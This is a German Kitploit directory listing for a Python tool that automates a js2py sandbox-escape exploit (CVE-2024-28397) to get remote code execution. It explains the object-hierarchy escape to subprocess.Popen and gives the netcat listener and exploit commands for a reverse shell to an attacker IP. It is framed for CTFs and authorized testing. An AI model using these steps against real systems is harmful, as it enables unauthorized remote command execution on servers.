Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-28397-Exploit-Automation — Ein Python-Automatisierungsskript zur Ausnutzung der Schwachstelle **js2py Sandbox Escape** (CVE-2024-28397). Dieses Tool automatisiert die Generierung und Zustellung von Payloads, um Remote Code Execution (RCE) auf verwundbaren Instanzen zu erreichen. | Kitploit
Tools/GitHubGitHub/l1337xi/cve-2024-28397-exploit-automation
Payload-GenerierungExploitationWebanwendungs-ExploitationCTFLernen & BildungRemote-Access-Tool
GitHubl1337xi/cve-2024-28397-exploit-automation

CVE-2024-28397-Exploit-Automation

Ein Python-Automatisierungsskript zur Ausnutzung der Schwachstelle **js2py Sandbox Escape** (CVE-2024-28397). Dieses Tool automatisiert die Generierung und Zustellung von Payloads, um Remote Code Execution (RCE) auf verwundbaren Instanzen zu erreichen.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
22vor 9 MonatenNoch nicht geprüft
Teilen

CVE-2024-28397 Exploit-Automatisierung

Ein Python-Automatisierungsskript zur Ausnutzung der js2py-Sandbox-Escape-Schwachstelle (CVE-2024-28397). Dieses Tool automatisiert die Generierung und Zustellung von Payloads, um Remote Code Execution (RCE) auf verwundbaren Instanzen zu erreichen.

⚠️ Rechtlicher Hinweis Die Verwendung dieses Tools zum Angriff auf Ziele ohne vorherige gegenseitige Zustimmung ist illegal. Dieses Repository dient ausschließlich zu Bildungszwecken. Der Autor ist nicht verantwortlich für jeglichen Missbrauch dieser Informationen. Dieses Tool ist für den Einsatz in autorisierten Sicherheitsbewertungen und Capture-The-Flag-Umgebungen (CTF) vorgesehen.

🧐 Über die Schwachstelle

CVE-2024-28397 betrifft die js2py-Bibliothek (Versionen < 0.74). Die Bibliothek isoliert die JavaScript-Umgebung nicht ordnungsgemäß von der Python-Hostumgebung.

  • Der Fehler: Eine unzureichende Eingabebereinigung ermöglicht den Zugriff auf die internen __class__- und __subclasses__-Attribute von Python.
  • Die Auswirkung: Ein Angreifer kann die Objekthierarchie durchlaufen, um auf subprocess.Popen zuzugreifen, was die Ausführung beliebiger Befehle auf dem Host-Server ermöglicht.

🚀 Funktionen

  • Automatische Payload-Generierung: Erstellt automatisch die JavaScript-Sandbox-Escape-Logik.
  • Base64-Kodierung: Übernimmt die Payload-Kodierung, um Syntaxfehler während der Übertragung zu vermeiden.
  • Verbindungsbehandlung: Erkennt die erfolgreiche Shell-Ausführung anhand von Request-Timeouts.
  • Professionelle Ausgabe: Saubere CLI-Oberfläche mit Statusmeldungen.

🛠️ Verwendung

Voraussetzungen

root@kitploit:~
pip install requests

Starten Sie Ihren Netcat-Listener :

root@kitploit:~
nc -lvnp 1337

Führen Sie das Skript aus :

root@kitploit:~
python3 exploit.py -u <target url> -i <attacker ip> -p <attacker port>

📸 Proof of Concept

Hier ist das Tool in Aktion gegen ein verwundbares Ziel (Hack The Box - CodeTwo):

1. Ausführung

Ausführen des Exploits, um den Payload zu generieren und den Callback auszulösen: crop3

2. Erfolg

Empfangen der Reverse Shell auf dem Listener: Reverse Shell Erfolg

  • 📜 Danksagungen

  • Schwachstellenentdeckung & Kern-JS-Payload: Marven11

  • Automatisierungsskript: L1337Xi

  • Mitwirkende:

    • Leyn4L
    • iamrizwanvp
    • axai457
Tool herunterladen